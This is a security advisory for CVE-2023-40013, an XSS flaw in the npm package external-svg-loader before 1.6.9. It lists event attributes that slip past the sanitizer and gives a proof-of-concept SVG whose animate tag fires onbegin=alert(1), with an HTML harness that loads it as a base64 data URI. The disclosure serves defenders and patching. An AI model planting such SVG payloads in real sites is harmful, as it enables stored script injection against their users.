GHSA-XC2R-JF2X-GJR8

Vulnerability from github – Published: 2023-08-14 21:32 – Updated: 2023-08-14 21:32
VLAI
Summary
external-svg-loader Cross-site Scripting vulnerability
Details

Summary

According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS.

Details

When trying to sanitize the svg the lib removes event attributes such as onmouseover, onclick but the list of events is not exhaustive. Here's a list of events not removed by svg-loader. onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart As you can see in the POC we can use onbegin in animate tag to execute JS code without needing to add data-js="enabled".

PoC

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <animate onbegin=alert(1) attributeName=x dur=1s>
</svg>

<html>
    <head>
        <script src="./dist/svg-loader.js" type="text/javascript"></script>
    </head>
    <body>
        <svg data-src="data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo="></svg>
    </body>
</html>

Impact

Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "external-svg-loader"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-40013"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-14T21:32:27Z",
    "nvd_published_at": "2023-08-14T21:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nAccording to the [docs](https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript), svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS. \n\n### Details\nWhen trying to sanitize the svg the lib [removes event attributes](https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128) such as `onmouseover`, `onclick` but the list of events is not exhaustive. Here\u0027s a list of events not removed by svg-loader. \n`onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart`\nAs you can see in the POC we can use `onbegin` in `animate` tag to execute JS code without needing to add `data-js=\"enabled\"`.\n\n### PoC\n\n```html\n\u003csvg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"\u003e\n  \u003canimate onbegin=alert(1) attributeName=x dur=1s\u003e\n\u003c/svg\u003e\n\n```\n\n```html\n\u003chtml\u003e\n    \u003chead\u003e\n        \u003cscript src=\"./dist/svg-loader.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\n    \u003c/head\u003e\n    \u003cbody\u003e\n        \u003csvg data-src=\"data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo=\"\u003e\u003c/svg\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nAny website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.\n",
  "id": "GHSA-xc2r-jf2x-gjr8",
  "modified": "2023-08-14T21:32:27Z",
  "published": "2023-08-14T21:32:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/shubhamjain/svg-loader/security/advisories/GHSA-xc2r-jf2x-gjr8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40013"
    },
    {
      "type": "WEB",
      "url": "https://github.com/shubhamjain/svg-loader/commit/d3562fc08497aec5f33eb82017fa1417b3319e2c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/shubhamjain/svg-loader"
    },
    {
      "type": "WEB",
      "url": "https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128"
    },
    {
      "type": "WEB",
      "url": "https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "external-svg-loader Cross-site Scripting vulnerability"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…